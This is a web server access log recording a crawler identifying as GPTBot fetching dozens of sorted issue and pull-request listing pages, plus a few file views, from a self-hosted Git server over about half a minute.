192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/naver_fetcher.cpython-312.pyc" +[17/Feb/2026:19:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:19:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPostgresWatchdog.pkg" [Client 74.7.227.38] [Length 18039] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:19:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:19:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=open&type=all" 